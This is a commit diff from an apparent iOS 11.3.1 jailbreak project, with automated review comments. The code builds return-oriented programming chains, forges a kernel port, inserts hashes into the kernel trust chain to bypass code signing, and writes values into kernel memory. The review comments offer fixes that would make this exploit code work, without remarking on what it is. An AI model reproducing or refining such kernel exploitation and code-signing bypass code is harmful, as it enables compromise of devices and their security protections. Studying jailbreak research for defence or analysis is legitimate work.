

[untether] 11.3.1 nearly working
littlelailo committed Feb 5, 2019
1 parent 9fd6820 commit a4e7023
Showing 6 changed files with 30 additions and 12 deletions.
2 changes: 2 additions & 0 deletions src/shared/common.h
@@ -17,6 +17,8 @@

#ifdef RELEASE
# define LOG(str, args...) do { } while(0)
#elif defined UNTETHERDBG
# define LOG(str, args...) do { NSLog(@"[%s] " str, __func__, ##args); sleep(1);} while(0)
#else
# define LOG(str, args...) do { NSLog(@"[%s] " str, __func__, ##args); } while(0)
#endif
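Review bot: The new UNTETHERDBG branch of `LOG` adds a `sleep(1)` after every log line, but nothing in the hunk says why, so a later reader may drop it or be surprised that this build is a second slower per call. Add a one-line comment above the `#elif` stating the purpose of the delay and that it is a debug-build-only behaviour. Because the delay lives inside the macro, any `LOG` inside a loop in that configuration pays it on every iteration, which is worth stating in the same comment.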
12 changes: 6 additions & 6 deletions src/shared/jailbreak.m
@@ -38,7 +38,7 @@
ret = KERN_FAILURE;\
goto out;\
}
#if 1
#if 0
offsets_t offs = (offsets_t){
#ifdef __LP64__
.constant = {
@@ -614,19 +614,19 @@ kern_return_t jailbreak(uint32_t opt)
{
if ((opt & JBOPT_POST_ONLY) != 0)
{
LOG("finished post exploitation, running ldrestart...");
LOG("finished post exploitation, respringing...");

if (access("/usr/bin/ldrestart", F_OK) != 0)
if (access("/usr/bin/killall", F_OK) != 0)
{
LOG("failed to find ldrestart?!");
LOG("failed to find killall?!");
ret = KERN_FAILURE;
goto out;
}

ret = execprog("/usr/bin/ldrestart", NULL);
ret = execprog("/usr/bin/killall", (const char**)&(const char * []) {"/usr/bin/killall","SpringBoard"});
if (ret != 0)
{
LOG("failed to execute ldrestart: %d", ret);
LOG("failed to execute killall: %d", ret);
ret = KERN_FAILURE;
goto out;
}
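Review bot: The argument array built on the `execprog("/usr/bin/killall", ...)` line has no terminating `NULL`; if `execprog` hands it to an `exec`/`posix_spawn`-style call (its definition is not in the hunk), the callee reads past the end of the two-element array. Taking the address of the compound literal and casting it to `const char**` also obscures this: the array already decays to that pointer type, so `ret = execprog("/usr/bin/killall", (const char *[]){ "/usr/bin/killall", "SpringBoard", NULL });` is both correct and clearer. The `#if 1` → `#if 0` switch in the first hunk disables the inline `offsets_t` block with no comment saying what now provides those values; a one-line note there would help. `jailbreak()` starts and ends outside this hunk.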
2 changes: 1 addition & 1 deletion src/untether/install.m
@@ -57,7 +57,7 @@ int install(const char *config_path, const char *racoon_path, const char *dyld_c
myoffsets.stage3_fileoffset = 0;
myoffsets.stage3_loadaddr = myoffsets.new_cache_addr-0x100000;
myoffsets.stage3_size = 0x10000; // get the file size and round at page boundry
myoffsets.stage3_jumpaddr = myoffsets.stage3_loadaddr + 0x65c0; // nm of the function we want to jump to
myoffsets.stage3_jumpaddr = myoffsets.stage3_loadaddr + 0x6544; // nm of the function we want to jump to
myoffsets.stage3_CS_blob = 49744; // jtool --sig shows that info and I think we can get it when parsing the header
myoffsets.stage3_CS_blob_size = 624; // same for this one

14 changes: 10 additions & 4 deletions src/untether/stage2.m
@@ -861,7 +861,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
ADD_LOOP_START("test_loop")
ROP_VAR_ARG_HOW_MANY(1);
ROP_VAR_ARG("dylib_str",2);
CALL("write",1,0,1024,0,0,0,0,0);
CALL("write",2,0,1024,0,0,0,0,0);


/*
@@ -899,6 +899,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {


kport_t * fakeport = malloc(sizeof(kport_t));
memset(fakeport,0,sizeof(kport_t));
fakeport->ip_bits = IO_BITS_ACTIVE | IOT_PORT | IKOT_NONE;
fakeport->ip_references = 100;
fakeport->ip_lock.type = 0x11;
@@ -959,8 +960,8 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
struct trust_chain * new_entry = malloc(sizeof(struct trust_chain));
snprintf((char*)&new_entry->uuid,16,"TURNDOWNFORWHAT?");
new_entry->count = 2;
hash_t my_dylib_hash = {0x01,0xea,0x3a,0xea,0x23,0x45,0x5f,0xc3,0x07,0x53,0xbe,0xa7,0x78,0x2d,0x1b,0x17,0xb1,0xa8,0x75,0xef};
hash_t my_binary_hash = {0x30,0x46,0x97,0xbb,0x51,0xc0,0xde,0x21,0x5c,0x3c,0xb5,0xa7,0x33,0xb2,0x1b,0x34,0xe1,0xa9,0xe5,0x3f};
hash_t my_dylib_hash = {0x23,0xc0,0xa7,0xcc,0x36,0xdd,0x3d,0xa7,0x4a,0x25,0x46,0x50,0x38,0xd9,0xa6,0x20,0x76,0x2e,0x51,0x70};
hash_t my_binary_hash = {0xd4,0xd3,0x79,0x1b,0x17,0x2d,0xa2,0xf1,0x89,0xbd,0x2f,0xa7,0x5a,0xf6,0x84,0xaa,0xbf,0x8e,0x08,0x67};
memcpy(&new_entry->hash[0],my_dylib_hash,20);
memcpy(&new_entry->hash[1],my_binary_hash,20);
DEFINE_ROP_VAR("new_trust_chain_entry",sizeof(struct trust_chain),new_entry);
@@ -1297,7 +1298,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {

ROP_VAR_ARG_HOW_MANY(1);
ROP_VAR_ARG("WEDIDIT",2);
CALL("write",1,0,1024,0,0,0,0,0);
CALL("write",2,0,1024,0,0,0,0,0);

ROP_VAR_ARG_HOW_MANY(3);
ROP_VAR_ARG64("self",1);
@@ -1514,6 +1515,7 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
CALL("mach_port_deallocate",0,0,0,0,0,0,0,0);
*/


// ghetto dlopen
// get a file descriptor for that dylib
DEFINE_ROP_VAR("dylib_fd",8,&buf);
@@ -1583,6 +1585,8 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
uint32_t itk_registered;
uint32_t ipr_size;
uint32_t sizeof_task;
uint32_t task_all_image_info_addr;
uint32_t task_all_image_info_size;
} struct_offsets;

struct {
@@ -1634,6 +1638,8 @@ void stage2(offset_struct_t * offsets,char * base_dir) {
lib_offsets->struct_offsets.itk_registered = 0x2f0;
lib_offsets->struct_offsets.ipr_size = 0x8;
lib_offsets->struct_offsets.sizeof_task = 0x5c8;
lib_offsets->struct_offsets.task_all_image_info_addr = 0x3a8;
lib_offsets->struct_offsets.task_all_image_info_addr = 0x3b0;
// iosurface stuff isn't set and also isn't used
lib_offsets->userland_funcs.write = get_addr_from_name(offsets,"write") - 0x180000000 + offsets->new_cache_addr;
lib_offsets->userland_funcs.IOConnectTrap6 = get_addr_from_name(offsets,"IOConnectTrap6") - 0x180000000 + offsets->new_cache_addr;
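Review bot: In the hunk at line 1634 both added lines assign `lib_offsets->struct_offsets.task_all_image_info_addr` (first `0x3a8`, then `0x3b0`), so the first store is dead and the `task_all_image_info_size` field added to the struct in the hunk at 1583 is never set anywhere in this commit; the second line was presumably meant for that field, since stage3.m reads both. The hunk at line 899 adds a `memset` on `fakeport` without checking the `malloc` on the line above; `kport_t * fakeport = calloc(1, sizeof *fakeport);` followed by a NULL check replaces both lines. The replaced hash arrays in the hunk at 959 would benefit from a comment naming which build of each binary they were computed from, since they silently stop matching once either file is rebuilt. `stage2()` begins and ends outside these hunks.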
8 changes: 7 additions & 1 deletion src/untether/stage3.m
@@ -80,6 +80,8 @@
uint32_t itk_registered;
uint32_t ipr_size;
uint32_t sizeof_task;
uint32_t task_all_image_info_addr;
uint32_t task_all_image_info_size;
} struct_offsets;

struct {
@@ -174,7 +176,7 @@
} mach_msg_data_buffer_t;

//#define LOG(str, args...) do { } while(0)
#define LOG(str, args...) do {offsets->userland_funcs.write(1,str,1024);offsets->userland_funcs.write(1,"\n\n\n\n",4);} while(0)
#define LOG(str, args...) do {offsets->userland_funcs.write(2,str,1024);offsets->userland_funcs.write(1,"\n\n\n\n",4);} while(0)
#define KERN_INVALID_ARGUMENT 2
#define KERN_FAILURE 1
#define KERN_SUCCESS 0
@@ -486,6 +488,10 @@ void where_it_all_starts(kport_t * fakeport,void * fake_client,uint64_t ip_kobje
offsets->userland_funcs.mach_port_destroy(offsets->userland_funcs.mach_task_self(), maps[0]);
offsets->userland_funcs.mach_port_destroy(offsets->userland_funcs.mach_task_self(), maps[1]);

// setup kernel base and slide for post
kwrite64(remap_addr + offsets->struct_offsets.task_all_image_info_addr,offsets->constant.kernel_image_base + kslide);
kwrite64(remap_addr + offsets->struct_offsets.task_all_image_info_size,kslide);

// remap must cover the entire struct and be page aligned
uint64_t remap_start = remap_addr & ~(pgsize - 1);
uint64_t remap_end = (remap_addr + offsets->struct_offsets.sizeof_task + pgsize) & ~(pgsize - 1);
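Review bot: The rewritten `LOG` macro at line 176 now sends the message to fd 2 while the trailing `"\n\n\n\n"` still goes to fd 1, so the two halves of one log line land on different streams. The message write also passes a fixed length of 1024 regardless of the literal's size, reading past the end of every shorter string, and the `args...` parameter is accepted but never used, so format arguments are silently dropped; none of that is new, but the hunk rewrites this line. A tighter form that keeps the same no-libc constraint is `#define LOG(str, args...) do { offsets->userland_funcs.write(2, str, sizeof(str) - 1); offsets->userland_funcs.write(2, "\n\n\n\n", 4); } while (0)`, which assumes every call site passes a string literal — the call sites are outside the hunk, so confirm that before changing it.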
4 changes: 4 additions & 0 deletions src/untether/stage4.m
@@ -2,12 +2,16 @@
#include <fcntl.h>
#include <unistd.h>
#include <Foundation/NSObjCRuntime.h>
#include <shared/jailbreak.h>

int main() {
/*
printf("I guess this is how it feels to run in C and with a normal cache, you can just call functions\n");
int fd = open("/bootstrap/test/yowhatsup",O_WRONLY | O_CREAT);
write(fd,"WEAREOUTHERE",13);
while (1) {
NSLog(@"YEHA\n");
}
*/
jailbreak(JBOPT_POST_ONLY);
}
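Review bot: `main` discards the `kern_return_t` returned by `jailbreak(JBOPT_POST_ONLY)` and falls off the end, so the process exit status never reflects a failure; `return jailbreak(JBOPT_POST_ONLY) == KERN_SUCCESS ? 0 : 1;` reports it, assuming `KERN_SUCCESS` is visible through the newly included `<shared/jailbreak.h>` (not shown here). The signature should be `int main(void)` rather than `int main()` in C. The `/* ... */` block above the call is dead code and is better deleted than kept commented out.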
